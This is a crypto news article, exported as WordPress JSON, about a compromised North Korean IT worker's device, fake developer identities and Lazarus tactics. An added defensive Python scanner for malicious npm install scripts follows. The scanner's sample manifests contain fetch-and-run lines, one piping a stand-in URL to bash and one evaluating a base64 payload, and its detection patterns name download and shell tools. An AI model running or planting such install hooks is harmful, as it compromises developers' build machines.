{"id":26082,"date":"2025-08-14T13:06:22","date_gmt":"2025-08-14T10:06:22","guid":{"rendered":"https:\/\/forklog.com\/en\/user-hacks-north-korean-hacker\/"},"modified":"2025-08-14T13:06:22","modified_gmt":"2025-08-14T10:06:22","slug":"user-hacks-north-korean-hacker","status":"publish","type":"post","link":"https:\/\/forklog.com\/en\/user-hacks-north-korean-hacker\/","title":{"rendered":"User Hacks North Korean Hacker"},"content":{"rendered":"<p>An unidentified user has compromised the device of a North Korean IT worker who was part of a small group linked to the theft of $680,000. This was revealed by blockchain detective ZachXBT.<\/p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">1\/ An unnamed source recently compromised a DPRK IT worker device which provided insights into how a small team of five ITWs operated 30+ fake identities with government IDs and purchased Upwork\/LinkedIn accounts to obtain developer jobs at projects. <a href=\"https:\/\/t.co\/DEMv0GNM79\">pic.twitter.com\/DEMv0GNM79<\/a><\/p>\n<p>\u2014 ZachXBT (@zachxbt) <a href=\"https:\/\/twitter.com\/zachxbt\/status\/1955613912201896113?ref_src=twsrc%5Etfw\">August 13, 2025<\/a><\/p><\/blockquote>\n<p> <script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>Six North Korean citizens created over 30 fictitious identities to secure positions at crypto projects. They bought forged government ID documents and ready-made LinkedIn and Upwork accounts, posing as experienced blockchain developers. 
One even made it through an interview at Polygon Labs for a full-stack engineer position, with a resume claiming prior work at OpenSea and Chainlink.<\/p>\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/forklog.com\/wp-content\/uploads\/AD_4nXe-xjP9WyOh5Mza84IQanZG2oVOtms2WEvNLETN3CKo4OzBzajKmYLgqfmMifxGpqTTN-rRHQilBbc1uBUl0LUJRXyok35Fud7UXQvzbROwHxwfQaiZxoGeU_hpN9dY34j8Zm0Nw.webp\" alt=\"User Hacks North Korean Hacker\" class=\"wp-image-263903\"\/><figcaption class=\"wp-element-caption\">Source: X.<\/figcaption><\/figure>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cMy professional experience in blockchain development spans over seven years (including university), although I have officially worked full-time for about five years. During this period, I developed smart contract systems, decentralized applications, and Web3 platforms, including at OpenSea, Chainlink Labs, and GreenBay,\u201d reads the script used for the fake identity named Henry Chan.<\/p>\n<\/blockquote>\n<p>The workers operated through the remote-access <span data-descr=\"software\" class=\"old_tooltip\">software<\/span> AnyDesk and hid their location behind VPNs. They used Google services for task planning and communication. In May, the group&#8217;s operating expenses came to $1,489, covering computer rentals and software subscriptions.<\/p>\n<p>Payments were routed through the Payoneer service. One of the wallets is linked to the group behind the June <a href=\"https:\/\/x.com\/zachxbt\/status\/1938599027748319442\">attack on the Favrr marketplace<\/a>, in which the perpetrators stole $680,000.<\/p>\n<p>The recovered search history included queries about deploying ERC-20 tokens on Solana and about leading AI companies in Europe. 
The most frequent query, however, was: \u201chow to tell if they are North Koreans?\u201d<\/p>\n<p>ZachXBT also noted that the history showed heavy use of Google Translate, translating from Korean to English from a Russian IP address.<\/p>\n<p>The blockchain detective urged crypto companies to vet candidates more carefully, stressing that these operations are not sophisticated. He noted that the exposure is made worse by overwhelmed HR teams.<\/p>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cThe main issue in combating DPRK IT workers (DPRK ITWs) is the lack of cooperation between government agencies and the private sector. Another challenge is the negligence of recruiting teams, who start arguing upon receiving warnings. The methods of DPRK ITWs are not sophisticated, but they are persistent due to their massive presence in the global job market,\u201d he noted.<\/p>\n<\/blockquote>\n<h2 class=\"wp-block-heading\">North Korean Hackers at Binance<\/h2>\n<p>Binance&#8217;s Chief Security Officer Jimmy Su told <a href=\"https:\/\/decrypt.co\/334943\/north-korean-hackers-binance\">Decrypt<\/a> that the exchange receives fake resumes from North Korean hackers daily. According to him, this has been going on for years, but the perpetrators&#8217; tactics have recently become more sophisticated.<\/p>\n<p>Previously, they sent template applications under Japanese and Chinese surnames. Now the cybercriminals use deepfakes and voice modulators in interviews, posing as developers from Europe or the Middle East.<\/p>\n<p>One giveaway is apparent connection lag: according to Su, the use of live translation and other real-time tools delays the candidates&#8217; responses by several seconds.<\/p>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cThe only reliable way to verify a candidate is to ask them to cover their face with their hand. 
The deepfake usually &#8216;breaks,&#8217; but we do not disclose all methods to avoid aiding the hackers,\u201d he added.<\/p>\n<\/blockquote>\n<p>A Binance representative stated that the exchange has never hired North Korean state agents but continues to monitor employees for suspicious behavior. Specialists from North Korea often rank among the top performers, most likely because they work multiple shifts. If someone never takes a break, not even to sleep, it is a typical sign of a Lazarus connection, Su noted.<\/p>\n<p>He added that some companies ask candidates to say something negative about North Korean leader Kim Jong Un during interviews, which is forbidden in the country.<\/p>\n<p>Beyond seeking employment, Lazarus also:<\/p>\n<ul class=\"wp-block-list\">\n<li>poisons <span data-descr=\"package manager included with Node.js\" class=\"old_tooltip\">NPM<\/span> packages, adding malicious code to public open-source packages that is then pulled into the projects that depend on them;<\/li>\n<li>runs phishing \u201cinterviews\u201d, posing as recruiters, sending a fake link to \u201cupdate Zoom\u201d and infecting the victim&#8217;s device with malware.<\/li>\n<\/ul>\n<p>In February, the Bybit exchange <a href=\"https:\/\/forklog.com\/en\/news\/bybit-exchange-suffers-1-46-billion-loss-in-hack\">lost<\/a> $1.46 billion in a hack. Cybersecurity experts <a href=\"https:\/\/forklog.com\/en\/news\/ben-zhou-majority-of-stolen-bybit-funds-remain-traceable\">blamed<\/a> the Lazarus group for it.<\/p>\n<p>In July, the Indian trading platform CoinDCX suffered a loss of $44.2 million. 
The cyberattack was also <a href=\"https:\/\/forklog.com\/en\/news\/lazarus-group-implicated-in-44-million-coindcx-hack\">attributed<\/a> to North Korean hackers.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An unidentified user has hacked the account of an IT specialist from North Korea, who was part of a small hacker group linked to the theft of $680,000. This was revealed by blockchain detective ZachXBT. 1\/ An unnamed source recently compromised a DPRK IT worker device which provided insights into how a small team of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":26081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"select":"","news_style_id":"","cryptorium_level":"","_short_excerpt_text":"","creation_source":"","_metatest_mainpost_news_update":false,"footnotes":""},"categories":[3],"tags":[44,1125,1202],"class_list":["post-26082","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-and-analysis","tag-cybercrime","tag-lazarus","tag-north-korea-dprk"],"aioseo_notices":[],"amp_enabled":true,"views":"130","promo_type":"","layout_type":"","short_excerpt":"","is_update":"","_links":{"self":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts\/26082","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/comments?post=26082"}],"version-history":[{"count":0,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts\/26082\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/media\/26081"}],"wp:attachment":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/media?parent=26082"}],"wp:t
erm":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/categories?post=26082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/tags?post=26082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
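The article's bullet on Lazarus adding malicious code to public NPM packages that then gets embedded in downstream projects describes a supply-chain vector whose most common shape is an install-time lifecycle script (preinstall/postinstall) that fetches, decodes or evals a payload while `npm install` runs, before anyone imports the package. The following is an added example, not code from ForkLog, ZachXBT, Binance or any project named on the page: it scans package.json manifests for that pattern. The indicator regexes are a heuristic chosen for this example, and the sample manifests are constructed, not real packages.

```python
"""Flag npm packages whose install-time lifecycle scripts look like droppers.

Added example, not code from the article or from any project it names. The
indicator patterns and the sample manifests below are constructed for this
example and are not taken from any real package.
"""
from __future__ import annotations

import json
import re
from pathlib import Path

# Hooks npm runs automatically for every dependency during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic indicators of a download-decode-execute dropper (assumption:
# tuned for this example, not exhaustive).
INDICATORS = {
    "downloads": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "remote_exec": re.compile(r"\b(eval|exec|child_process|spawn)\b", re.I),
    "encoded_payload": re.compile(r"\b(base64|atob)\b", re.I),
    "inline_node": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b"),
}


def inspect_manifest(manifest: dict) -> list[dict]:
    """Return one finding per install hook whose command matches an indicator."""
    findings: list[dict] = []
    scripts = manifest.get("scripts")
    if not isinstance(scripts, dict):
        return findings
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
        if hits:
            findings.append({
                "package": f"{manifest.get('name', '?')}@{manifest.get('version', '?')}",
                "hook": hook,
                "script": cmd,
                "indicators": hits,
            })
    return findings


def scan_manifests(manifests) -> list[dict]:
    """Scan an iterable of parsed package.json dicts."""
    findings: list[dict] = []
    for manifest in manifests:
        findings.extend(inspect_manifest(manifest))
    return findings


def scan_node_modules(root) -> list[dict]:
    """Walk an installed node_modules tree and scan every package.json in it."""
    manifests = []
    for path in Path(root).rglob("package.json"):
        try:
            manifests.append(json.loads(path.read_text(encoding="utf-8")))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than crash
    return scan_manifests(manifests)


# Constructed sample manifests (not real packages).
SAMPLE_MANIFESTS = [
    {"name": "harmless-util", "version": "1.0.0",
     "scripts": {"test": "node test.js"}},
    # Runs code at install time but shows no indicator, so it is NOT flagged.
    # A dropper hidden inside install.js is the blind spot of text heuristics.
    {"name": "native-binding", "version": "0.19.0",
     "scripts": {"postinstall": "node install.js"}},
    {"name": "totally-legit-utils", "version": "2.3.1",
     "scripts": {"postinstall": "curl -s https://example.invalid/p.sh | bash"}},
    {"name": "wallet-helper", "version": "0.0.3",
     "scripts": {"preinstall": "node -e \"eval(Buffer.from('...','base64').toString())\""}},
]

if __name__ == "__main__":
    for f in scan_manifests(SAMPLE_MANIFESTS):
        print(f"{f['package']} {f['hook']}: {', '.join(f['indicators'])}\n    {f['script']}")
```

Run `scan_node_modules("node_modules")` after an install to triage what just executed on the build host. The stronger control is to set `ignore-scripts=true` in the project's `.npmrc` so lifecycle scripts never run by default and to re-enable them only for the few packages whose native build genuinely needs them; as the `native-binding` sample shows, a clean-looking `node install.js` is no evidence of safety.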